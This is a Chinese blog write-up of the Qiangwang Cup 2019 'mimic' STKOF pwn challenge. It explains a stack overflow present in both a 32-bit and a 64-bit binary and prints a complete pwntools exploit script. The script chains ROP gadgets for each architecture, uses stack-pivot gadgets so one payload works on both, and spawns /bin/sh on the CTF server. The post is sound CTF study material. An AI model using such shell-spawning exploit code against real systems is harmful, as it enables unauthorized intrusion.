强网杯2019 拟态 STKOF

已于 2022-02-25 11:36:13 修改
阅读量4.2k 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: 安全 web安全 pwn
于 2022-02-25 11:31:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123129110
版权

强网杯2019 拟态 STKOF

查看保护
在这里插入图片描述
在这里插入图片描述
栈溢出漏洞,但是这里加上了一个拟态防御。拟态防御其实就是对比32位和64位的输出或者看哪个程序crash掉,不一样则报错。
通俗易懂的来说其实就是exp可能打通过32位又可以打通过64位。
攻击思路:这一题目的话只是一个简单的栈溢出漏洞。又是静态链接来的所以可以找到很多的gadgets。这里的32位和64的payload直接用ropgadget生成的。改一下重复的就行了p += pack('<I', 0x080a8af6) # pop eax ; ret这个就可以直接代替inc eax
改完32和64的payload之后就是先加上32位的偏移。因为32位到ret为0x10c + 4而64位为0x10c + 8
这里差了4。所以可以借助add esp来进行一个栈迁移。
首先使用add esp, 0xc将32的payload迁移到 64位的ret后面。填一下0x4,接着将64位的ret使用add esp, 0xd8。将64位的payload给栈迁移到32位的payload后面。注意 使用\x00来截断
这样一来无论是32位和64位都可以用这一个exp来打通

from pwn import *
from struct import pack
#context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r02'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25948)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

# Padding goes here
p = b''

p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x080a8af6) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9064) # @ .data + 4
p += pack('<I', 0x080a8af6) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x08056040) # xor eax, eax ; ret
p += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080d9060) # @ .data
p += pack('<I', 0x0806e9f2) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x080d9060) # padding without overwrite ebx
p += pack('<I', 0x0806e9cb) # pop edx ; ret
p += pack('<I', 0x080d9068) # @ .data + 8
p += pack('<I', 0x08056040) # xor eax, eax ; ret
p += pack('<I', 0x080a8af6) # pop eax ; ret
p += p32(0xb)
p += pack('<I', 0x080495a3) # int 0x80

payload32 = p
print(len(payload32))

#r.sendline(b'a' * (0x10c + 4) + payload32)

p = b''

p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
p += pack('<Q', 0x00000000006a10e0) # @ .data
p += pack('<Q', 0x000000000043b97c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004005f6) # pop rdi ; ret
p += pack('<Q', 0x00000000006a10e0) # @ .data
p += pack('<Q', 0x0000000000405895) # pop rsi ; ret
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
p += pack('<Q', 0x000000000043b9d5) # pop rdx ; ret
p += pack('<Q', 0x00000000006a10e8) # @ .data + 8
p += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000043b97c) # pop rax ; ret
p += p64(0x3b)
p += pack('<Q', 0x00000000004011dc) # syscall
payload64 = p
print(len(payload64))

add_esp = 0x080a8f69 # add esp, 0xc ; ret

add_rsp = 0x00000000004079d4 # add rsp, 0xd8 ; ret

payload = b'a'.ljust(0x110, b'\x00') + p32(add_esp) + b'a' * 4 + p64(add_rsp) + payload32.ljust(0xd8,b'\x00') + payload64

r.sendline(payload)

r.interactive()

这里笔者还遇到了一个qipa东西。笔者直接用ropgadget生成的payload加上32位的偏移打远程的时候打一两次可以直接打通。。。。可能是因为首先打32位的时候直接拿到shell之后,远程的拟态裁决程序有时候crash不了(XD

z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
强网杯-拟态
Stella_Leo的博客
08-24 301
做了一道拟态防御的题目。程序给了两个附件,一个32位一个64位。只有PIE保护没有开启。 32位 int vul() { char v1; // [esp+Ch] [ebp-10Ch] setbuf(stdin, 0); setbuf(stdout, 0); j_memset_ifunc((int)&v1, 0, 256); read(0, &v1, 768); return puts(&v1); } 非常明显的一个溢出 64位 __int64 vul()
强网杯2019 拟态 STKOF【buu刷题】
m0_73756460的博客
07-05 67
强网杯2019 拟态 STKOF【buu刷题】
第五届“强网”拟态防御国际精英挑战赛——预选赛入围战队篇
Cyberpeace的博客
12-02 1150
第五届“强网”拟态防御国际精英挑战赛战队集结完毕,期待各位顶峰相见!
BUUCTF pwn wp 121 - 125
fa1c4的blog
03-24 703
qctf2018_stack2 强网杯2019 拟态 STKOF zctf_2016_note3 bcloud_bctf_2016 hgame2018_flag_server hgame2018_flag_server$ file flag_server;checksec flag_server flag_server: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
第四届“强网”拟态防御国际精英挑战赛.zip
12-07
拟态防御 CTF 国际精英挑战赛
关于强网拟态题目 EasyFilter1
08-03
第一个关键点在第38到44行,在pathdup变量中找到 resource= 这个关键字,如果没有这个关键字,直 第二个关键点在第46行,将 resource=
内生安全拟态防御PPT
09-05
内生安全拟态防御PPT 内生安全是指一种对象模型拥有广义鲁棒控制构造,能在不依赖关于攻击者先验知识和行为特征信息的情况下,将基于模型内部漏洞后门等“暗功能”的不确定扰动,归一化为可用概率表达的传统可靠...
白菜新拟态.zip 白菜新拟态.zip
06-27
白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜新拟态.zip白菜...
拟态风格的PPT模板
06-05
拟态风格PPT模板,分为动态版本和静态版本,里面有4K演示视频,可以作为PPT模板使用
MIMIC Defense CTF 2019 final writeup
晓得哥的博客
05-31 530
作者:LoRexxar’@知道创宇404实验室 上周有幸去南京参加了强网杯拟态挑战赛,运气比较好拿了第二名,只是可惜是最后8分钟被爆了,差一点儿真是有点儿可惜。 有关于拟态的观念我会在后面讲防火墙黑盒攻击的 writeup 时再详细写,抛开拟态不谈,赛宁这次引入的比赛模式我觉得还蛮有趣的,白盒排位赛的排名决定你是不是能挑战白盒拟态,这样的多线并行挑战考验的除了你的实际水平,也给比赛本身平添了一些有...
ls -ali $0 shellcode 任意地址改4字节 unlink house of force 拟态防御
carol2358的博客
07-23 442
文章目录rci rci 考察ls -ali显示inode 在tmp目录下创建0x2f+1个文件夹,然后随机进入一个 ls -lai 来显示当前目录的 inode, 再去tmp目录下ls -ali显示inode,找到相同的,绕过strcmp 然后$0来实现sh,绕过check2 没exp,直接nc 第一个 ...
BUU刷题(三)
playmaker的博客
03-13 932
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
强网杯 签到re 签到pwn 题解
qq_41071646的博客
05-27 1984
强网杯给打自闭了 最后也是没有进到第一页 比较可惜 不过手速快 抢到了 先锋的三血 感觉还不错 不得不说强网的反作弊做的真心不错 re 都能每个人的flag 不一样 真心可以 然后强网的 pwn题竟然还有用队伍 token来搞 真的秀 先说re 即可得出flag Just re 这个题目也算是签到题 首先要修复函数 虽然 上面xmmword_405018 变化...
buuctf中的一些pwn题总结(不断更新)
PLpa的博客
08-19 4453
前言: 本文记录一些buuctf中不是很典型,但是仍然值得记录的pwn题,以便于查看。 0x00:stkof——unlink 查看保护 查看IDA伪代码 增 自定义size,使用malloc分配。 删 free之后直接置空,难以利用。 改 重点来到改中,这里可以随意输入大小,然后根据输入的大小来为堆块中填入数据。这样就造成了堆溢出漏洞。 解题思路 由于此题存在堆溢出漏洞,我们又掌控着heap地址的存在位置,这样我们很容易就想到unlink漏洞来控制堆块。 由于程序本身的原因,我们先malloc一个堆
BUUCTF【pwn】解题记录(4-6页持续更新中)
Assassin
08-06 1542
一起继续刷BUUCTF把~
[强网杯 2019]随便注
沐目的博客
10-20 837
1知识点 1.1MySQL命令 原来堆叠注入竟然真的有用,真的就像这道题所说的,安全和开发缺一不可。很久没用过堆叠注入了。复习一下把。 查看所有数据库:0’;show databases;%23 查看当前数据库的表: 1’;show tables;%23 查看某个表的某个字段: 0’;show username from users;%23 把users表名改为user:rename table...
2022强网杯pwn部分wp
N1rvana的博客
08-02 1489
2022强网杯pwn
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
最新发布
HACKONE的博客
06-23 73
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
Android 实现新拟态效果
05-17
拟态(Neumorphism)是一种流行的 UI 设计趋势,它采用了一种类似于凸起和凹陷的效果,使得 UI 元素看起来更加真实和生动。下面是一些实现新拟态效果的 Android 库和框架: 1. Neumorphism-Android:这是一个开源...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值